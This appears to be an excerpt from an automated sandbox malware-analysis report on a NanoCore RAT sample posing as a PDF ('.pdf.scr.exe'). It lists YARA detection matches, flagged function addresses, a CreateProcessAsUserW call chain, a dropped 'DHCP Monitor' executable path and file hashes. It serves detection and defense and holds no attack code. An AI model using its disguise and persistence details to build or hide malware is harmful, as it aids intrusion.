Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: 026910003102350.pdf.scr.exe

Detected potential crypto function

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CC848E	0_2_00CC848E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD6CDC	0_2_00CD6CDC
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CC40FE	0_2_00CC40FE
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD4088	0_2_00CD4088
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD00B7	0_2_00CD00B7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CE51C9	0_2_00CE51C9
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD7153	0_2_00CD7153
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD62CA	0_2_00CD62CA
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CC32F7	0_2_00CC32F7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD43BF	0_2_00CD43BF
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CED440	0_2_00CED440
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCF461	0_2_00CCF461
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCC426	0_2_00CCC426
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD77EF	0_2_00CD77EF
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CED8EE	0_2_00CED8EE
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CC286B	0_2_00CC286B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CF19F4	0_2_00CF19F4
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCE9B7	0_2_00CCE9B7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD3E0B	0_2_00CD3E0B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCEFE2	0_2_00CCEFE2
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CE4F9A	0_2_00CE4F9A
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00338037	2_2_00338037
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00332007	2_2_00332007
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032E0BE	2_2_0032E0BE
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0031E1A0	2_2_0031E1A0
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0031225D	2_2_0031225D
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0034A28E	2_2_0034A28E
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003322C2	2_2_003322C2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032C59E	2_2_0032C59E
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0039C7A3	2_2_0039C7A3
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0034E89F	2_2_0034E89F
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038291A	2_2_0038291A
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00346AFB	2_2_00346AFB
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00378B27	2_2_00378B27
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0033CE30	2_2_0033CE30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00347169	2_2_00347169
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003A51D2	2_2_003A51D2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00319240	2_2_00319240
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00319499	2_2_00319499
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00331724	2_2_00331724
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00331A96	2_2_00331A96
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00319B60	2_2_00319B60
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00337BAB	2_2_00337BAB
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00331D40	2_2_00331D40
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00337DDA	2_2_00337DDA

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

2_2_00371A91

Tries to load missing DLLs

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50

Uses 32bit PE files

Source: 026910003102350.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
